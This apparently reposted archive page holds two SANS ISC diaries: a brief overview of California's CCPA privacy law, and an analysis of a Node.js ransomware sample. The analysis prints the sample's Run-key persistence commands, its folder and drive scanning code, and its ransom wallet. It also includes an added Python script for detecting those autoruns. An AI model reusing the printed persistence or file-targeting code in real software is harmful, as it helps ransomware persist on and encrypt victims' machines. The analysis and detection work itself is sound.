Archive for January 2nd, 2020

CCPA – Quick Overview, (Fri, Jan 3rd)

It has been quiet lately. Hopefully, it is not the calm before a storm, if you will. I crawled out from under my rock and found that the State of California law offering new consumer protections went into effect on Jan 1, 2020. So I poked around the Interwebs to learn what to expect. For what it's worth, I am not a resident of California, so I am not particularly entitled to these new protections today. I do think it is a sign of what is coming. Europe implemented the General Data Protection Regulation a couple of years ago, and more states are adopting more consumer protections each year. Let's hope they have enough teeth to have an impact. I took some time to read through the law [1] to highlight it for you. Please note that I am not an attorney, nor do I have any interest in being one. Let's take a look.

The CCPA (California Consumer Privacy Act) [1] was passed in June 2018 and went into effect on January 1, 2020. Some report that the Attorney General's office will begin enforcement on July 1, 2020; the law itself [1] does not cite an enforcement date. Some companies have released statements that they are adopting it for all customers, not just those in the State of California. FWIW, I have seen some sites recently, even prior to the first of the year, that now offer conspicuous opt-out links.

The CCPA…

  - Grants consumers the right to request:
      - the specific pieces of personal information a business collects;
      - the categories of sources from which that information is collected;
      - the business purposes for collecting or selling the information;
      - the categories of third parties with which the information is shared;
      - deletion of personal information, upon receipt of a verified request;
      - that the business not sell their personal information (opt out).
  - Authorizes businesses to offer financial incentives for the collection of personal information (the consumer must opt in).
  - Prohibits businesses from selling the information of a consumer under 16 years of age without an opt in.
  - Businesses are not required to provide information more than twice in a 12-month period.
  - Businesses must provide a clear and conspicuous link on their Internet home page titled "Do Not Sell My Personal Information".
  - A consumer's opt out is good for 12 months before the business may request authorization to sell their information again.

If you think there are any other points to highlight that I did not mention, then please comment below to add to the discussion.

-Kevin


ISC Handler on Duty

[1] https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=201720180AB375

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS.

Ransomware in Node.js, (Thu, Jan 2nd)

Happy new year to all! I hope that you enjoyed the switch to 2020! From a security point of view, nothing changed: malicious code never stops trying to abuse our resources, even during the holiday season. Here is a sample that I spotted two days ago. It is an interesting one because it is malware implementing ransomware features, developed in Node.js [1]! The first stage is not obfuscated, and I suspect the script is a prototype or a test. It was submitted to VT from Bahrain (SHA256: 90acae3f682f01864e49c756bc9d46f153fcc4a7e703fd1723a8aa7ec01b378c) and currently has a score of 12/58 [2].

The first stage is a VBScript that decodes the ransomware, sets up persistence and deploys a local Node.js instance running the generated files in %USERPROFILE%\AppData\Local:

GFp0JAk\lLT8PCI.js
GFp0JAk\node_modules\graceful-fs\fs.js
GFp0JAk\node_modules\graceful-fs\package.json
GFp0JAk\node_modules\graceful-fs\graceful-fs.js
GFp0JAk\node_modules\graceful-fs\legacy-streams.js
GFp0JAk\node_modules\graceful-fs\polyfills.js

Node.js is downloaded from hxxps://nodejs[.]org/download/release/latest-v8.x/win-x86/node.exe and saved as %USERPROFILE%\AppData\Local\GFp0JAk\GFp0JAk.exe

Persistence is added via three values under the HKCU Run key:

' "Microsoft Office": re-launch the VBScript dropper at logon
oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Office", "wscript " & strVbs, "REG_SZ"
' "Startup": run the dropped node.exe with the ransomware entry point script
oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Startup", strExe & " " & outWorkingDir & "\" & strEntPoint & " decryptStatic", "REG_SZ"
' "Windows": open the ransom note HTML page in the default browser
oShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows", "cmd /c start  /min " & outWorkingDir & "\How-to-buy-bitcoins.html", "REG_SZ"
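As an added triage example (not code from the diary or the sample), the function below parses the output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and flags the three autorun patterns described above: a script host launched at logon, a user-writable executable that runs a .js file, and cmd starting an HTML file. The sample output is constructed; the .vbs file name is a placeholder because the diary does not give it.

```python
import re
from typing import List, Tuple

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output. Three values mirror the persistence described in the diary; "OneDrive" is
# a benign control. PLACEHOLDER.vbs stands in for the dropper name the diary omits.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive            REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Microsoft Office    REG_SZ    wscript C:\Users\alice\AppData\Local\GFp0JAk\PLACEHOLDER.vbs
    Startup             REG_SZ    C:\Users\alice\AppData\Local\GFp0JAk\GFp0JAk.exe C:\Users\alice\AppData\Local\GFp0JAk\lLT8PCI.js decryptStatic
    Windows             REG_SZ    cmd /c start  /min C:\Users\alice\AppData\Local\GFp0JAk\How-to-buy-bitcoins.html
"""

# reg query prints value lines indented, with columns separated by runs of spaces.
VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def parse_run_values(text: str) -> List[Tuple[str, str]]:
    """Return (value name, command line) pairs from reg query output, in key order."""
    values = []
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values.append((m.group("name"), m.group("data")))
    return values


def classify(command: str) -> str:
    """Return the reason an autorun matches one of the diary's patterns, or '' if benign."""
    c = command.lower()
    # Pattern 1: wscript/cscript re-launching a script at logon
    if re.match(r'^"?(wscript|cscript)(\.exe)?"?\s', c):
        return "script host launched at logon"
    # Pattern 2: an .exe under the user-writable AppData\Local tree given a .js argument
    if re.search(r'\\appdata\\local\\[^"]*\.exe"?\s+[^"]*\.js\b', c):
        return "user-writable exe running a .js file (Node.js-style loader)"
    # Pattern 3: cmd /c start of an HTML page (the ransom note)
    if re.search(r"^cmd(\.exe)?\s+/c\s+start\b.*\.html?$", c):
        return "cmd start of an HTML file at logon"
    return ""


def suspicious_autoruns(text: str) -> List[Tuple[str, str]]:
    """Flag Run values that match any pattern, returning (value name, reason)."""
    return [(name, classify(cmd)) for name, cmd in parse_run_values(text) if classify(cmd)]
```

On a live host the same function can be fed the output of `reg query` captured from a triage script; anything flagged should be correlated with the dropped files and the ShellBags deletion described below.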

The script's main loop performs the following tasks every 40 seconds:

  1. Checks whether node.exe has been downloaded and, if not, downloads it and writes it to disk.
  2. Writes the Node.js module and files to disk (see the list above).
  3. Deploys the Node.js code.

Once done, an "initdone" file is created and the desktop layout (icons and their positions) is reset by deleting the registry key:

HKCU\Software\Microsoft\Windows\Shell\Bags\1\Desktop

Now, let’s have a look at the Node.js code, the ransomware itself.

This code is obfuscated but easy to process with a JavaScript beautifier. Here is some interesting extracted information:

Ransom price: 0.4 BTC
Bitcoin wallet: 18aBKwKJvMCkZmpkcCbW9b9y9snAmU3kgo[3]

Encryption is performed via a public/private key pair.

Files to encrypt are scanned via this function:

scan = function() {
    var b = [];
    // User profile folders that will be searched for files to encrypt
    b.push(userprofile + "\\Desktop\\");
    b.push(userprofile + "\\Documents\\");
    b.push(userprofile + "\\Downloads\\");
    b.push(userprofile + "\\Contacts\\");
    b.push(userprofile + "\\Pictures\\");
    b.push(userprofile + "\\Music\\");
    b.push(userprofile + "\\Videos\\");
    b.push(userprofile + "\\AppData\\Local\\Microsoft\\Outlook\\");
    // Probe drive letters B: through Z: (66 = 'B'); a drive is kept only if a test file can be written to it
    for (var a = 0; 25 > a; a++) {
        var c = String.fromCharCode(66 + a) + ":\\",
            d = c + "\\" + testFile;
        if (fs.existsSync(c)) try {
            fs.writeFileSync(d, "", "utf-8"), b.push(c), removeFile(d)
        } catch (e) {}
    }
    return b
};

The ransomware notification is also generated on the fly:

I did not find a contact email address for the victims, and the encrypted file extension is empty in the code. If you have more information about this sample, please share it!

[1] https://nodejs.org/en/
[2] https://www.virustotal.com/gui/file/90acae3f682f01864e49c756bc9d46f153fcc4a7e703fd1723a8aa7ec01b378c/detection
[3] https://www.blockchain.com/btc/address/18aBKwKJvMCkZmpkcCbW9b9y9snAmU3kgo

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
